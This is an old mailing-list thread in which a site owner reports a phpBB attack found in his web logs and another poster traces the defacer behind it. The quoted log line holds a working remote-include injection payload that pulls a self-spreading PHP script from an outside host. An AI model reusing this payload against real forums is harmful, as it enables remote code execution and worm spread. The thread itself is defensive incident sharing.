Interestingly enough if you google for a combinations of that log
entry you dont get much until you hit "sirh0t".
Google turns up quite a bit on this busy fellow as evidenced here:
http://www.google.com/search?hl=en&lr=&c2coff=1&q=sirh0t&btnG=Search
sirh0t seems to be into defacing phbb forums and a bit of botting.
The real entertaining part is when you go to the w00pie.nl (sirh0ts)
site, it seems to have been defaced by another group "0x1fe crew" that
have a low opinion of our lad sirh0t, I'll leave the content for you
to view at:
http://w00pie.nl
A bit more googling turns up the following:
"Five computer hackers in the Netherlands have been handed sentences
ranging from work orders to youth detention for disabling a number of
websites operated by the Dutch government."
http://lists.jammed.com/ISN/2005/03/0090.html
Have a nice day.
On 12/10/05, Robin <robin@kallisti.net.nz> wrote:
I just noticed these in my logs:
63.193.240.128 - - [11/Dec/2005:01:43:25 +1300]
"GET /pbem/viewtopic.php?t=37&highlight=%2527.$poster=include($_GET[m]).
%2527&m=http://www.yatas.com/phpbb_private.txt?&; HTTP/1.0" 403 1094
"http://www.google.nl/"; "Mozilla/4.0 (modded by sirh0t fuck Aleks)"
this is pointing to a phpBB install that I chmod'ed away just recently (it
was unused and attracting spam), hence the 403. A quick google for the UA
string doesn't show up anything, however the URL that it links to seems
to contain a PHP script that at a quick glance uses Google and Lycos to
find more phpBB sites and spread to them. (If the yatas.com link is gone,
and anyone wants a copy of the file, mail me offlist)
I'm also curious to know what the versions vulnerable to this exploit are.
--
Robin <robin@kallisti.net.nz> JabberID: <eythian@jabber.kallisti.net.nz>
Hostes alienigeni me abduxerunt. Qui annus est?
PGP Key 0xA99CEB6D = 5957 6D23 8B16 EFAB FEF8 7175 14D3 6485 A99C EB6D
